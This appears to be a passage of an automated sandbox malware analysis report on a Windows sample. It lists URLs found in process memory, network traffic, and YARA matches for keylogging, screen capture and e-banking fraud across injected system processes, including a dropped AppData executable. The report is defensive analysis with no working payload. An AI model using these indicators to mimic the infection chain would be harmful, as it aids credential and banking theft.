            Source: svchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
            Source: svchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.activity.windows.comer
            Source: svchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.activity.windows.coms
            Source: explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
            Source: explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
            Source: svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
            Source: svchost.exe, 00000006.00000002.2938509388.0000019E297F1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1717384345.0000019E297F1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.onenote.net/livetile/?Language=en-GB
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
            Source: explorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
            Source: explorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
            Source: StartMenuExperienceHost.exe, 00000009.00000000.1726328708.000001B981425000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2904840792.000001B981425000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.comcp
            Source: SearchApp.exe, 0000000B.00000000.1803975206.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://fb.me/react-polyfills
            Source: SearchApp.exe, 0000000B.00000000.1780439279.0000024B44916000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://fb.me/react-polyfillsThis
            Source: svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
            Source: SearchApp.exe, 0000000B.00000000.1774416665.0000024B447D3000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://graph.windows.net/
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
            Source: explorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
            Source: svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1823827959.0000024B55CEE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
            Source: svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/
            Source: svchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://login.windows.local
            Source: svchost.exe, 00000005.00000002.2910596872.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1714440936.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://login.windows.local/
            Source: svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://login.windows.net
            Source: svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://login.windows.net/
            Source: SearchApp.exe, 0000000B.00000000.1769556330.0000024B443C2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://loki.delve.office.com/api
            Source: SearchApp.exe, 0000000B.00000000.1854349272.0000024B5843A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://mths.be/fromcodepoint
            Source: StartMenuExperienceHost.exe, 00000009.00000000.1726392280.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2908493718.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com
            Source: explorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com_
            Source: SearchApp.exe, 0000000B.00000000.1758577403.0000024B420F9000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.live.com/owa
            Source: SearchApp.exe, 0000000B.00000000.1774416665.0000024B447D3000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.office.com/
            Source: SearchApp.exe, 0000000B.00000000.1774346407.0000024B447CF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.office.com/M365.Access
            Source: SearchApp.exe, 0000000B.00000000.1804409730.0000024B54E44000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/
            Source: SearchApp.exe, 0000000B.00000000.1810169868.0000024B55259000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.office365.com/mail/deeplink/attachment/
            Source: explorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comcember
            Source: StartMenuExperienceHost.exe, 00000009.00000000.1726328708.000001B981425000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2904840792.000001B981425000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comxee
            Source: SearchApp.exe, 0000000B.00000000.1803975206.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
            Source: SearchApp.exe, 0000000B.00000000.1814959925.0000024B5542F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1774416665.0000024B447D3000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://substrate.office.com
            Source: SearchApp.exe, 0000000B.00000000.1810169868.0000024B55259000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWriteO
            Source: SearchApp.exe, 0000000B.00000000.1769556330.0000024B443C2000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://substrate.office.com/search/api
            Source: SearchApp.exe, 0000000B.00000000.1810169868.0000024B55259000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://substrate.office.com/search/api/v1/events?scenario=
            Source: SearchApp.exe, 0000000B.00000000.1811664629.0000024B5530E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://substrate.office.com/search/api/v2/queryetItemChttps://substrate.office365.us/search/api/v2/
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000003.00000000.1640019930.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C557000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns.windows.com/L
            Source: explorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1726328708.000001B981425000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2904840792.000001B981425000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.com
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
            Source: explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
            Source: SearchApp.exe, 0000000B.00000000.1810169868.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000B.00000000.1810169868.0000024B55240000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbm
            Source: SearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000B.00000000.1810169868.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: SearchApp.exe, 0000000B.00000000.1757604184.0000024B41F45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.ng.com
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
            Source: explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
            Source: svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1766426485.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
            Source: svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
            Source: SearchApp.exe, 0000000B.00000000.1766426485.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.comm
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49729 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: Yara match | File source: Process Memory Space: java.exe PID: 7284, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: winver.exe PID: 7344, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: sihost.exe PID: 3420, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3456, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3528, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: ctfmon.exe PID: 3832, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4196, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: StartMenuExperienceHost.exe PID: 4660, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4872, type: MEMORYSTR

            E-Banking Fraud

            Source: Yara match | File source: Process Memory Space: java.exe PID: 7284, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: winver.exe PID: 7344, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: sihost.exe PID: 3420, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3456, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3528, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: ctfmon.exe PID: 3832, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4196, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: StartMenuExperienceHost.exe PID: 4660, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4872, type: MEMORYSTR
            Source: C:\Windows\explorer.exe | Code function: 3_2_013A2270 NtQueryDirectoryFile
            Source: C:\Windows\explorer.exe | Code function: 3_2_013A1EE1 NtCreateUserProcess
            Source: C:\Windows\System32\sihost.exe | Code function: 4_2_00AC21D1 NtEnumerateValueKey
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02260005
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02261845
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02260EA9
            Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_02F00E85
            Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_02F01821
            Source: C:\Windows\explorer.exe | Code function: 3_2_01381821
            Source: C:\Windows\explorer.exe | Code function: 3_2_01380E85
            Source: C:\Windows\explorer.exe | Code function: 3_2_013A1821
            Source: C:\Windows\explorer.exe | Code function: 3_2_013A0E85
            Source: C:\Windows\System32\sihost.exe | Code function: 4_2_00AC0E85
            Source: C:\Windows\System32\sihost.exe | Code function: 4_2_00AC1821
            Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00910E85
            Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00911821
            Source: C:\Windows\System32\svchost.exe | Code function: 6_2_009A0E85
            Source: C:\Windows\System32\svchost.exe | Code function: 6_2_009A1821
            Source: C:\Windows\System32\ctfmon.exe | Code function: 7_2_00A50E85
            Source: C:\Windows\System32\ctfmon.exe | Code function: 7_2_00A51821
            Source: C:\Windows\System32\svchost.exe | Code function: 8_2_00D40E85
            Source: C:\Windows\System32\svchost.exe | Code function: 8_2_00D41821
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Code function: 9_2_00B50E85
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Code function: 9_2_00B51821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 10_2_00111821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 10_2_00110E85
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Code function: 12_2_001C1821
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Code function: 12_2_001C0E85
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Code function: 12_2_02380005
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Code function: 12_2_02380EA9
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 15_2_00AB0E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 15_2_00AB1821
            Source: C:\Windows\System32\smartscreen.exe | Code function: 16_2_00291821
            Source: C:\Windows\System32\smartscreen.exe | Code function: 16_2_00290E85
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Code function: 17_2_001C1821
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Code function: 17_2_001C0E85
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Code function: 17_2_023A0005
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Code function: 17_2_023A0EA9
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe | Code function: 19_2_00581821
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe | Code function: 19_2_00580E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 20_2_003D1821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 20_2_003D0E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 23_2_00900E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 23_2_00901821
            Source: C:\Windows\System32\ApplicationFrameHost.exe | Code function: 24_2_00181821
            Source: C:\Windows\System32\ApplicationFrameHost.exe | Code function: 24_2_00180E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 26_2_00191821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 26_2_00190E85
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exe | Code function: 28_2_00011821
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exe | Code function: 28_2_00010E85
            Source: C:\Windows\System32\svchost.exe | Code function: 29_2_00221821
            Source: C:\Windows\System32\svchost.exe | Code function: 29_2_00220E85
            Source: C:\Windows\System32\dllhost.exe | Code function: 30_2_006E1821
            Source: C:\Windows\System32\dllhost.exe | Code function: 30_2_006E0E85
            Source: C:\Windows\System32\conhost.exe | Code function: 31_2_00E60E85
            Source: C:\Windows\System32\conhost.exe | Code function: 31_2_00E61821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 32_2_00940E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 32_2_00941821
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 34_2_00B00E85
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 34_2_00B01821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 35_2_02860E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 35_2_02861821
